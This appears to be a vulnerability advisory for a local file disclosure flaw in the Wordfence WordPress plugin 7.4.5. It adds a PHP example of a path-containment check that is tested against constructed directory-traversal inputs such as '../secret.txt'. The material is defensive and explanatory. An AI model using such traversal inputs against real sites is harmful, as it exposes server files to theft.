Vendor: Wordpress Plugin wordfence
By: mehran feizi
CVSS: 8.8 (HIGH)
Local File Disclosure
CWE: 22
Product Name: Wordpress Plugin wordfence
Affected Version From: 7.4.5
Affected Version To: 7.4.5
Patch Exists: YES
Related CWE: N/A
CPE: a:wordpress:wordpress_plugin:wordfence
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2020
WordPress Plugin wordfence.7.4.5 – Local File Disclosure
An attacker can exploit this vulnerability by sending a crafted HTTP request to a site running the WordPress plugin Wordfence 7.4.5. The 'file' parameter of the request lets the attacker read arbitrary files from the server. The vulnerable code is in the 'wordfenceClass.php' file, where the 'readfile' function reads the file named by the 'file' parameter.
Mitigation:
The vendor has released a patch to address this vulnerability. Users running Wordfence 7.4.5 should update to the latest version of the plugin.
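A containment check for a request-supplied file name before it reaches 'readfile', shown as an added example; it is not Wordfence's code or the vendor's patch. The helper name resolve_contained, the directory layout and the sample inputs are hypothetical and constructed for the demonstration.

```php
<?php
// Added example, not Wordfence code. resolve_contained() is a hypothetical helper.
declare(strict_types=1);

/**
 * Resolve $requested relative to $baseDir. Returns the canonical path only if
 * it is an existing regular file inside $baseDir, otherwise null.
 */
function resolve_contained(string $baseDir, string $requested): ?string
{
    $base = realpath($baseDir);
    // Reject an unusable base directory and embedded NUL bytes up front.
    if ($base === false || strpos($requested, "\0") !== false) {
        return null;
    }
    // realpath() collapses "..", "." and symlinks; false if the target is missing.
    $real = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($real === false || !is_file($real)) {
        return null;
    }
    // Compare with a trailing separator so ".../logs-old" never matches ".../logs".
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($real, $prefix, strlen($prefix)) === 0 ? $real : null;
}

// Constructed directory tree: one servable file, two files that must stay private.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'lfd_demo_' . bin2hex(random_bytes(4));
mkdir($root . '/logs', 0700, true);
mkdir($root . '/logs-old', 0700);
file_put_contents($root . '/logs/scan.log', "constructed log line\n");
file_put_contents($root . '/logs-old/old.log', "constructed old log\n");
file_put_contents($root . '/secret.txt', "constructed secret\n");

// Constructed values standing in for the 'file' request parameter.
$cases = ['scan.log', '../secret.txt', '../logs-old/old.log', $root . '/secret.txt', 'missing.log'];
foreach ($cases as $file) {
    $path = resolve_contained($root . '/logs', $file);
    printf("%-45s %s\n", $file, $path === null ? 'rejected' : 'allowed');
    // In a request handler: call readfile($path) only when $path !== null,
    // and return a 404 otherwise.
}
```

Only the file that resolves inside the base directory is allowed; the traversal, sibling-directory, absolute-path and missing-file inputs all resolve to null.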